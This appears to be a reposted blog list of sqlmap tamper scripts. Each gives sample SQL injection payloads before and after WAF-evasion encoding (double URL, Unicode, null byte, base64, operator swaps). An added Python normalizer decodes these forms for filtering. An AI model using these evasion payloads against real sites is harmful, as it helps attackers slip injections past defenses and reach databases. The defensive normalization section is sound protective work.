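Hi everyone, I'm 哥哥不爱吃米饭. If you like my posts, feel free to follow me.
First of all, this article is a repost from:
http://www.chuhades.com/post/19590b_4cc51f
It is really practical, so I'm keeping it here as a record for future lookup.
(1) apostrophemask.py UTF-8 encoding
Example: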
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
(2) apostrophenullencode.py Unicode encoding
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
(3) appendnullbyte.py appends %00
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
(4) base64encode.py base64 encoding
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
(5) between.py replaces ">" with "not between"
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
(6) bluecoat.py replaces spaces with a random whitespace character and "=" with "like"
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
(7) chardoubleencode.py double URL encoding
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
(8) charencode.py URL encoding
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
(9) charunicodeencode.py Unicode-encodes characters that are not already URL-encoded
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
(10) equaltolike.py replaces "=" with "like"
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
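Seen from the filtering side, the encoding-based entries above (1, 2, 3, 7, 8, 9 and the whitespace half of 6) all collapse to the same text once the input is canonicalized before any rule is matched. The following is an added example, not part of the reposted article or of sqlmap; the names canonicalize, PCT_U, MAX_ROUNDS and SAMPLES are assumptions made for illustration.

```python
import re
import unicodedata
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: more nested encoding layers than this is rejected
PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")  # non-standard %uXXXX escape


def canonicalize(value: str) -> str:
    """Reduce a raw parameter to one canonical form before rule matching."""
    for _ in range(MAX_ROUNDS):
        decoded = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded)  # ordinary %XX, decoded as UTF-8
        if decoded == value:  # stable: every encoding layer is peeled
            break
        value = decoded
    else:
        raise ValueError("too many encoding layers")
    value = unicodedata.normalize("NFKC", value)  # fullwidth U+FF07 -> '
    value = value.replace("\x00", "")  # drop NUL bytes
    return re.sub(r"\s+", " ", value).strip()  # tab padding -> one space


# Outputs taken from the list above, mapped to the form a rule should see.
SAMPLES = {
    "AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87": "AND '1'='1'",
    "AND %00%271%00%27=%00%271%00%27": "AND '1'='1'",
    "AND 1=1%00": "AND 1=1",
    "%2553%2545%254c%2545%2543%2554": "SELECT",  # shortened from (7)
    "%u0053%u0045%u004c%u0045%u0043%u0054": "SELECT",  # shortened from (9)
    "SELECT%09id FROM users where id LIKE 1":
        "SELECT id FROM users where id LIKE 1",
}

if __name__ == "__main__":
    for raw, expected in SAMPLES.items():
        got = canonicalize(raw)
        print(f"{raw[:40]!r:45} -> {got!r}  ok={got == expected}")
```

The operator rewrites in (5), (6) and (10) are valid SQL rather than encodings, so no normalizer undoes them; parameterized queries are what make them harmless.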
To be continued…